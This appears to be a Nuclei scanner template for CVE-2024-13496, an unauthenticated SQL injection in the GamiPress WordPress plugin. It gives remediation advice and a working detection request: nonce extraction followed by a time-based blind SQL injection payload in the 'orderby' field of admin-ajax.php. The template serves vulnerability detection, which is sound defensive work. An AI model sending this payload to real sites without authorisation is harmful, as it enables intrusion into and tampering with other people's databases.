id: CVE-2024-13496 info: name: GamiPress <= 2.8.9 - SQL Injection author: ritikchaddha severity: high description: | GamiPress WordPress plugin version 2.8.9 and below suffers from an SQL injection vulnerability due to insufficient sanitization of user input, allowing attackers to execute arbitrary SQL commands. impact: | Unauthenticated attackers can execute arbitrary SQL commands to extract, modify, or delete database contents, potentially compromising the entire WordPress installation. remediation: | Update GamiPress plugin to version 2.8.10 or later. reference: - https://abrahack.com/posts/gamipress-sqli/ - https://nvd.nist.gov/vuln/detail/CVE-2024-13496 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-13496 cwe-id: CWE-89 epss-score: 0.02191 epss-percentile: 0.80052 metadata: max-requests: 2 fofa-query: body="/wp-content/plugins/gamipress" tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin,vuln http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | @timeout: 30s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=WebKitFormBoundaryPzS34wz7rAyyJYSi ------WebKitFormBoundaryPzS34wz7rAyyJYSi Content-Disposition: form-data; name="action" gamipress_get_logs ------WebKitFormBoundaryPzS34wz7rAyyJYSi Content-Disposition: form-data; name="nonce" {{nonce}} ------WebKitFormBoundaryPzS34wz7rAyyJYSi Content-Disposition: form-data; name="orderby" (SELECT/**/sleep(8)/**/FROM/**/dual/**/WHERE/**/1/**/LIKE/**/1)# ------WebKitFormBoundaryPzS34wz7rAyyJYSi-- matchers: - type: dsl dsl: - 'duration>= 8' - 'status == 200' - 'contains(headers, "application/json")' - 'contains(body, "success\":true")' condition: and extractors: - type: regex part: body name: nonce group: 1 regex: - '"nonce":"([0-9a-z]+)"' internal: true # digest: 4b0a00483046022100898709bc03855bbd2ecfc91ef04bb9f6ae3203cc26a47f8db801de561104cacf02210083568cd854998b56d2c9f453b6681350a09eecf515823309d798367204bc76c2:922c64590222798bb761d5b6d8e72950